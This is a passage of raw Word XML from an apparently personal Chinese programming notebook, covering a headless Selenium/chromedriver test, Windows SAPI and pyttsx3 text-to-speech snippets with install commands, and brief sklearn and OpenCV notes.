    <w:p w14:paraId="52AF7A60" w14:textId="77777777" w:rsidR="00D61C80" w:rsidRDefault="00D61C80" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解压命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A01145" w14:textId="30F6954F" w:rsidR="00621D49" w:rsidRDefault="00D61C80" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00BA7A5F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>unzip chromedriver_linux64.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4777E4A5" w14:textId="77777777" w:rsidR="00621D49" w:rsidRDefault="00621D49" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E399761" w14:textId="77777777" w:rsidR="00667DF0" w:rsidRDefault="00667DF0" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="619" w:name="_Toc159780052"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>selenium</w:t>
      </w:r>
      <w:bookmarkEnd w:id="619"/>
    </w:p>
    <w:p w14:paraId="42BAF61B" w14:textId="62714E7C" w:rsidR="00065FD0" w:rsidRPr="00667DF0" w:rsidRDefault="00667DF0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>chromedriver</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拷贝到你的代码的目录下（或者放在你喜欢的路径下，记住初始化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的时候指定路径</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:executable_path=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>YourPath/chromedriver</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>’）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB571B2" w14:textId="77777777" w:rsidR="00065FD0" w:rsidRDefault="00065FD0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3256180A" w14:textId="77777777" w:rsidR="00B17F23" w:rsidRPr="00B17F23" w:rsidRDefault="00B17F23" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B17F23">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>from selenium import webdriver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE5087B" w14:textId="77777777" w:rsidR="00B17F23" w:rsidRPr="00B17F23" w:rsidRDefault="00B17F23" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B17F23">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>from selenium.webdriver.chrome.options import Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C833027" w14:textId="77777777" w:rsidR="00B17F23" w:rsidRPr="00B17F23" w:rsidRDefault="00B17F23" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FDAF700" w14:textId="77777777" w:rsidR="00B17F23" w:rsidRPr="00B17F23" w:rsidRDefault="00B17F23" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B17F23">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>chrome_options = Options()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4282A2" w14:textId="77777777" w:rsidR="00B17F23" w:rsidRPr="00B17F23" w:rsidRDefault="00B17F23" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B17F23">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">chrome_options.add_argument("--mute-audio")  # </w:t>
      </w:r>
      <w:r w:rsidRPr="00B17F23">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>将浏览器静音</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489A4D34" w14:textId="77777777" w:rsidR="00B17F23" w:rsidRPr="00B17F23" w:rsidRDefault="00B17F23" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B17F23">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"># chrome_options.add_experimental_option("detach", True)  # </w:t>
      </w:r>
      <w:r w:rsidRPr="00B17F23">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>当程序结束时，浏览器不会关闭</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6290A140" w14:textId="77777777" w:rsidR="00B17F23" w:rsidRPr="00B17F23" w:rsidRDefault="00B17F23" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6186FA87" w14:textId="77777777" w:rsidR="00B17F23" w:rsidRPr="00B17F23" w:rsidRDefault="00B17F23" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B17F23">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># -----</w:t>
      </w:r>
      <w:r w:rsidRPr="00B17F23">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>如果咋们的</w:t>
      </w:r>
      <w:r w:rsidRPr="00B17F23">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00B17F23">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>系统没有安装桌面，下面两句一定要有哦，必须开启无界面浏览器</w:t>
      </w:r>
      <w:r w:rsidRPr="00B17F23">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>-------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1245E490" w14:textId="77777777" w:rsidR="00B17F23" w:rsidRPr="00B17F23" w:rsidRDefault="00B17F23" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B17F23">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>chrome_options.add_argument("--headless")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5E21C9" w14:textId="77777777" w:rsidR="00B17F23" w:rsidRPr="00B17F23" w:rsidRDefault="00B17F23" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B17F23">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>chrome_options.add_argument("--disable-gpu")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C42DBB6" w14:textId="77777777" w:rsidR="00B17F23" w:rsidRPr="00B17F23" w:rsidRDefault="00B17F23" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B17F23">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># ------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B10A6C4" w14:textId="51199EED" w:rsidR="00B17F23" w:rsidRPr="00B17F23" w:rsidRDefault="00B17F23" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B17F23">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>browser = webdriver.Chrome(options=chrome_options,executable_path='./chromedriver')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6424EF87" w14:textId="4B993F2E" w:rsidR="00B17F23" w:rsidRPr="00B17F23" w:rsidRDefault="00B17F23" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B17F23">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>browser.get('https://blog.csdn.net/FujLiny')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1621D4D4" w14:textId="1A6FBC58" w:rsidR="00B17F23" w:rsidRPr="00B17F23" w:rsidRDefault="00B17F23" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B17F23">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>print('</w:t>
      </w:r>
      <w:r w:rsidRPr="00B17F23">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>不离鞘</w:t>
      </w:r>
      <w:r w:rsidRPr="00B17F23">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>' in browser.page_source)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E9C648" w14:textId="2AEE7E4B" w:rsidR="008D0165" w:rsidRDefault="00B17F23" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00B17F23">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">browser.quit()  # </w:t>
      </w:r>
      <w:r w:rsidRPr="00B17F23">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>关闭浏览器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1951F72D" w14:textId="77777777" w:rsidR="00DA0799" w:rsidRDefault="00DA0799" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05568BD9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C32F34A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19AC169B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79EBFF0A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DA40E74" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49CB60AA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A484296" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="612F2C63" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="620" w:name="_Toc159780053"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语音控制：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python3.7 + Yolo3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="620"/>
    </w:p>
    <w:p w14:paraId="69C6BF22" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://www.qetool.com/scripts/view/9713.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089F6E25" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67513F68" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="621" w:name="_Toc159780054"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地库进行语音阅读</w:t>
      </w:r>
      <w:bookmarkEnd w:id="621"/>
    </w:p>
    <w:p w14:paraId="32FA5AF0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497F8114" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import win32com.client as win</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B87B894" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t># SpVoice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类是支持语音合成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(TTS)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的核心类。通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SpVoice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TTS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引擎，从而实现朗读功能</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C0D736" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>speak = win.Dispatch("SAPI.SpVoice")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610D1D77" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>完成将文本信息转换为语音并按照指定的参数进行朗读。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3038D1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该方法有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Flags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两个参数，分别指定要朗读的文本和朗读方式（同步或异步等）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08009AEC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>speak.Speak("come on")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A43FFEA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>speak.Speak("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你好</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBD85FB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC9BD16" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1867B2BC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="622" w:name="_Toc159780055"/>
      <w:r>
        <w:t>pyttsx3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="622"/>
    </w:p>
    <w:p w14:paraId="5D40A38C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">pip install </w:t>
      </w:r>
      <w:bookmarkStart w:id="623" w:name="OLE_LINK9"/>
      <w:bookmarkStart w:id="624" w:name="OLE_LINK8"/>
      <w:r>
        <w:t>pyttsx3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="623"/>
      <w:r>
        <w:t xml:space="preserve"> -i </w:t>
      </w:r>
      <w:hyperlink r:id="rId162" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://mirrors.aliyun.com/pypi/simple/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="624"/>
    <w:p w14:paraId="13CF161E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">pip3 install pyttsx3 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9031BA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="625" w:name="OLE_LINK10"/>
      <w:r>
        <w:t xml:space="preserve">sudo apt install espeak </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D06238" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>sudo apt install python3-pyaudio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D54DA48" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>sudo apt install libespeak-dev</w:t>
      </w:r>
      <w:bookmarkEnd w:id="625"/>
    </w:p>
    <w:p w14:paraId="4B46D120" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76D191B6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="626" w:name="_Toc159780056"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sklearn</w:t>
      </w:r>
      <w:bookmarkEnd w:id="626"/>
    </w:p>
    <w:p w14:paraId="60CFF232" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="248B4467" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>knn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>邻近算法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCBEDE6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sklearn.neighbors.KNeighborsClassifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63725929" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34D3541C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A4E8453" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">sklearn.datasets.load_iris() # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加载鸢尾花数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213728F0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">seaborn.heatmap() # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绘制热图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2A4F49" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09728843" w14:textId="77777777" w:rsidR="00634F46" w:rsidRDefault="00634F46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43D47478" w14:textId="33EA104E" w:rsidR="00634F46" w:rsidRDefault="00634F46" w:rsidP="00634F46">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00634F46">
        <w:t>opencv-python==4.9.0.80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07132FE8" w14:textId="06168CE0" w:rsidR="00634F46" w:rsidRDefault="00F27BBE" w:rsidP="00F27BBE">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将视频的每一帧切出保存</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CEC3E0" w14:textId="77777777" w:rsidR="00634F46" w:rsidRDefault="00634F46" w:rsidP="00634F46"/>
